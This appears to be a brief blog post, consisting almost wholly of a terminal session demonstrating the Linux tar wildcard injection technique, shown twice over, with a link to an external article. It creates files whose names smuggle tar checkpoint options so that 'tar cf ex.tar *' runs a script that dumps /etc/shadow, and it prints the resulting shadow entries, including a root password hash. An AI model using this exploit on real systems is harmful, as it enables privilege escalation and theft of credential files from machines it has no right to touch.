Exploiting wildcards on Linux

2017-11-10 xiphiasilver 0 댓글

root@kali:/var/www/html/test# ls -alh
합계 12K
-rw-r--r-- 1 root     root        0 11월 10 07:48 --checkpoint-action=exec=sh shell.sh
-rw-r--r-- 1 root     root        0 11월 10 07:48 --checkpoint=1
drwxr-xr-x 2 root     root     4.0K 11월 10 08:05 .
drwxr-xr-x 4 www-data www-data 4.0K 11월 10 07:48 ..
-rw-r--r-- 1 root     root        0 11월 10 07:48 1
-rw-r--r-- 1 root     root        0 11월 10 07:48 2
-rw-r--r-- 1 root     root        0 11월 10 07:48 3
-rw-r--r-- 1 root     root       17 11월 10 07:56 shell.sh
root@kali:/var/www/html/test# cat shell.sh
cat /etc/shadow;
root@kali:/var/www/html/test# tar cf ex.tar *
root:$6$VsH8XI63$ZkjYUfvFCv5yaRedsGKV/Y75OTwSG7iqmXYXre3Ec1dzH1qxMVSdemMKLAXq/6LlvXp1k7CDFUenAleKDJpv7/:17428:0:99999:7:::
daemon:*:17272:0:99999:7:::
bin:*:17272:0:99999:7:::
sys:*:17272:0:99999:7:::
sync:*:17272:0:99999:7:::
games:*:17272:0:99999:7:::
man:*:17272:0:99999:7:::

root@kali:/var/www/html/test# ls -alh

합계 12K

-rw-r--r-- 1 root root 0 11월 10 07:48 --checkpoint-action=exec=sh shell.sh

-rw-r--r-- 1 root root 0 11월 10 07:48 --checkpoint=1

drwxr-xr-x 2 root root 4.0K 11월 10 08:05 .

drwxr-xr-x 4 www-data www-data 4.0K 11월 10 07:48 ..

-rw-r--r-- 1 root root 0 11월 10 07:48 1

-rw-r--r-- 1 root root 0 11월 10 07:48 2

-rw-r--r-- 1 root root 0 11월 10 07:48 3

-rw-r--r-- 1 root root 17 11월 10 07:56 shell.sh

root@kali:/var/www/html/test# cat shell.sh

cat /etc/shadow;

root@kali:/var/www/html/test# tar cf ex.tar *

root:$6$VsH8XI63$ZkjYUfvFCv5yaRedsGKV/Y75OTwSG7iqmXYXre3Ec1dzH1qxMVSdemMKLAXq/6LlvXp1k7CDFUenAleKDJpv7/:17428:0:99999:7:::

daemon:*:17272:0:99999:7:::

bin:*:17272:0:99999:7:::

sys:*:17272:0:99999:7:::

sync:*:17272:0:99999:7:::

games:*:17272:0:99999:7:::

man:*:17272:0:99999:7:::

& https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/